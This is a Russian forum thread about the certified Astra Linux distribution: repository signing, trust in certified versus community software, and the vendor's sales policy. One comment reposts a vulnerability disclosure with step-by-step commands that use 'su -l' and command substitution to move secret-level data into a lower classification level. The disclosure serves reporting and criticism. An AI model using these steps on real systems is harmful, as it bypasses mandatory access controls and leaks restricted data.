id: Гость   вход   регистрация
текущее время 17:20 29/03/2024
Автор темы: Гость, тема открыта 26/03/2014 16:18 Печать
Категории: софт, свободный софт, операционные системы, программные закладки
https://www.pgpru.com/Форум/UnixLike/РусскаяОСAstraLinux
создать
просмотр
ссылки

Русская защищенная ОС Astra Linux


Есть такая отечественная операционная система – Astra Linux: http://www.astra-linux.com
Насчет "отечетсвенности" сказано с некторой натяжкой, поскольку разработана на основе Debian.
Но зато имеет важное отличие – сертификат по безопасности от ФСБ, о котором сказано следующее:


"...На сегодняшний день «Astra Linux Special Edition» – это единственная в России операционная система, сертифицированная во всех трех системах сертификации средств защиты информации (ФСБ, Минобороны, ФСТЭК), позволяющая обрабатывать информацию ограниченного доступа, включая сведения, составляющие государственную тайну до степени секретности “совершенно секретно” включительно".


Разрешение на допуск к разработке совершенно секретных данных – это, конечно, круто, если не ошибаюсь – круче, чем NT.
Для русского патриота, которого коробит даже от мысли о возможном сливе информации в АНБ через вражеские ОСи, Astra Linux может оказаться настоящей находкой.


Но что скажут об этой ОС обитатели pgpru.com? Может, у кого-то уже есть опыт ее использования, отзывы, как насчет совместимости с репозитариями от Debian и допустимы ли они без потери достигнутой безопасности?
Потому что по описанию на сайте Astra выглядит кучеряво, а вот как оно на самом деле...


PS. Есть еще ОС "РОСА", но по отзывам, специалисты ее почему-то не очень жалуют.


 
На страницу: 1, 2, 3 След.
Комментарии
— unknown (26/03/2014 16:49)   профиль/связь   <#>
комментариев: 9796   документов: 488   редакций: 5664

По идее, недопустимы. Там должны стоять ссылки на свои репозитарии, которые переподписаны своими ключами. Всякое обновление от Debian должно попадать туда, перепроверяться, перекомпилироваться и переподписываться. Иначе вы потеряете сертифицированность продукта.

По-крайней мере, так должно быть, иначе сертификация не имеет смысла.
— Гость (26/03/2014 17:24)   <#>
Индусская, корейская, хоть французкая.

Если линукс – база. Основной язык дистрибутива обязан быть английским.

Холодная война проиграна.

Иначе у него горстка последователей будет, и пользователей тоже.

Батька Путин может пролабировать, всем коррумпированным чиновникам застряпать лаптопы с ней, слегка толкнуть в пропасть, так сказать.
— unknown (26/03/2014 17:45)   профиль/связь   <#>
комментариев: 9796   документов: 488   редакций: 5664

У сертифицированных ОС в любой стране будет горстка последователей. Для использования в плане личной безопасности государственная сертификация не нужна. Скорее даже наоборот.

И наоборот, для госучреждений нужно формальное заверение безопасности. Они не могут доверять только открытому сообществу разработчиков.


Это тут ни причём. Если что-то происходит в какой-то конкретной стране, не надо приписывать все местные реалии до кучи.
— Гость (26/03/2014 20:31)   <#>
unknown, спасибо, у вас, как всегда – трезвый взвешенный ответ :)
В отличие от некоторых "навальных".
Добавлю, что "Astra Linux Special Edition" скачать даже для тестирования нельзя, стоит она 20000 руб. и продается только организациям, что на мой взгляд весьма глупо, т.к. снижает массовость.
А " Astra Linux Common Edition" можно свободно скачать и использовать, но md5 имеет позорный косяк – сами полюбуйтесь:


Конечно, это легко правится в пять секунд, но говорит наплевательском отношении производителся к своему продукту, т.к. все проблемы начинаются с мелочей.

Скорее даже наоборот

А любопытно – почему?
— unknown (26/03/2014 20:56)   профиль/связь   <#>
комментариев: 9796   документов: 488   редакций: 5664
Потому что наехать на сообщество свободных разработчиков с целью выдать ключ, вставлять трояны в персонифицированных атаках и пр. — можно, но сложно, если их много, они мотивированы идеями свободного ПО; рассредоточены, но связаны отношениями подтверждаемого доверия.

А разработчики сертифицированного ПО — да вот же они, сидят в одном офисе фирмы-контрактора в кучке кабинетов, вот их допуски-подписки, вот их начальство; вот их зарплата, которая идёт от контракта на продажи продукта госструктурам. Они люди подневольные. В крайнем случае могут повторить подвиг Сноудена, но это же маловероятно.
— Гость (26/03/2014 21:10)   <#>
Т.е. в этом смысле RedHat должен вызывать менее доверия, чм Debian?
— Гость (26/03/2014 21:10)   <#>
в смысле RHEL
— Гость (27/03/2014 05:27)   <#>

/comment16828. Не найду точную цитату, но здесь уже обсуждалось: при компрометации RedHat'овских серверов публичного репорта от компании не было, все детали скрыты. Признали, что был взлом, но как, кто, что, из-за чего, почему — всё молчок. В Debian не так, и это вселяет больше доверия. И ещё: /Форум/UnixLike/DebianVFedora. Fedora — RH-based.
— Гость (27/03/2014 05:32)   <#>
Я, может, скажу ересь, но в других дистрах (которые не Debian-based) вообще подписи на пакетах есть, или там как в BSD, одни хэши, которые распространяются с севера, авторизованного по ssh-ключу?
— unknown (27/03/2014 09:42)   профиль/связь   <#>
комментариев: 9796   документов: 488   редакций: 5664
В RH-based есть, причём полная поддержка появилась раньше Debian.
— Гость (27/03/2014 15:07)   <#>
В Slackware есть.
— Гость (31/03/2014 13:15, исправлен 31/03/2014 13:40)   <#>

Рекомендуемое оборудование. Надо ли это понимать так, что эти компании "наши", в том смысле что на их обоудовании нет враждебных аппаратно-программных жучков? Всё таки гостайна до "совершенно секретно" как-никак...

— unknown (31/03/2014 13:43)   профиль/связь   <#>
комментариев: 9796   документов: 488   редакций: 5664
На оборудование может требоваться отдельная сертификация. Возможно, на оборудовании из списка она уже стандартно отработана.

Или просто какое-то предпочитаемое оборудование работает для системы из-коробки, без особых настроек, без необходимости использовать какие-то закрытые драйвера.
— Гость (20/04/2014 00:33)   <#>
Из жизни криворуких кодеров:

Критическая уязвимость в Astra Linux

Jun. 28th, 2013 at 11:38 AM


Есть такой дистрибутив линукса Astra Linux Special Edition, который сертифицирован МО РФ, ФСТЕК.
И который создается в лучших традициях линуксоидов, виндовых программистов решивших писать под линукс, как под виндовс, ну и специфических реалиях российской оборонки. Понятно что из этого всего что-то нормальное не могло получится.
В итоге сделали кучу костылей, вместо того, чтобы доделать уже существующие и надежно работающие решения.
В итоге был найден эксплойт для получения доступа к данным различного уровня доступа.

Под катом репост оригинала:

Описание уязвимости

Критическая уязвимость в Astra Linux позволяет пользователю изменять категории мандатного доступа, понижая степень секретности и класс для сведений.
Одной из причин описанной проблемы является закрытость проекта и построение велосипедов вместо использования значительно более проверенных и протестированных решений, таких, как SELinux.
Для мандатного контроля доступа в Astra Linux используются следующие компоненты: модуль ядра parsecfs, реализующий монтирование файловых систем, видимых пользователям с одинаковым уровнем доступа, аудит действий пользователя и мандатный контроль доступа, юзерспейсный сервис для настройки ядерной части и модули PAM для аутентификации и авторизации пользователей.
Идеологически модель, используемая в Astra Linux напоминает модель модель Белла-Лападулы, реализованную в Multi-level security политике SELinux, но имеет одно отличие: пользователю разрешено выбирать при входе в систему, с каким классом и уровнем сведений он желает работать.
При обычной работе пользователь даже не видит документы, имеющие другой класс, так как содержимое его домашнего каталога фактически “монтируется” заново при каждом входе в систему.
При этом, пользователю по умолчанию разрешено выполнять команду su, причём эта команда, помимо ID пользователя, изменяет и его мандатную метку, а опция -l “перемонтирует” и его домашний каталог.

Эксплоит

1) Создаём юзера, указав ему минимальный уровень доступа 0, а максимальный 1:
level2:0:0:1:0
2) Логинимся от секретного пользователя.

Astra Linux SE 1.3 (smolensk)
tty1
astra login: level2
Secret level [1]: 1

3) Создаём файл с секретными данными

level2@astra$ echo “secret message” >test.txt

4) Повышаем привиллегии, открываем файл на чтение в старой сессии и скармливаем в новую
level2@astra$ su -l level2 -c “echo `cat test1.txt` > secret.txt”

5) Проверяем результат, заходим с другим уровнем доступа:
Astra Linux SE 1.3 (smolensk)
tty1
astra login: level2
Secret level [1]: 0

level2@astra$ cat secret.txt
secret message

Аналогичным образом возможен перенос документов между категориями и различными пользователями. Резюмируя вышесказанное, критическая уязвимость в Astra Linux несёт серьёзную угрозу безопасности органов государственной власти.

http://werwolf-lg.livejournal.com/230582.html
— Гость (19/05/2014 03:15)   <#>
Получил ответ от представителей ASTRA:

Здравствуйте, участник ppgpru.com!

Просим Вас сообщить какую организацию Вы представляете? Мы готовы
предоставить Вам операционную систему Astra Linux Special Edition,
с комплектом эксплуатационной документации, стандартным способом
по официальному письму-запросу.


Для получения более подробной информации просим Вас обращаться по
телефону, указанному ниже.

С уважением,
Служба сопровождения ОАО "НПО РусБИТех"

тел. +7 (495) 648-15-30

e-mail:
support@.....

(email затер от спамботов, но если кому нужно, могу выслать почтой.

Так найдутся у нас смельчаки, желающие потестить Special Edition?
(на себя принять не могу, поскольку частное лицо).
На страницу: 1, 2, 3 След.
Ваша оценка документа [показать результаты]
-3-2-1 0+1+2+3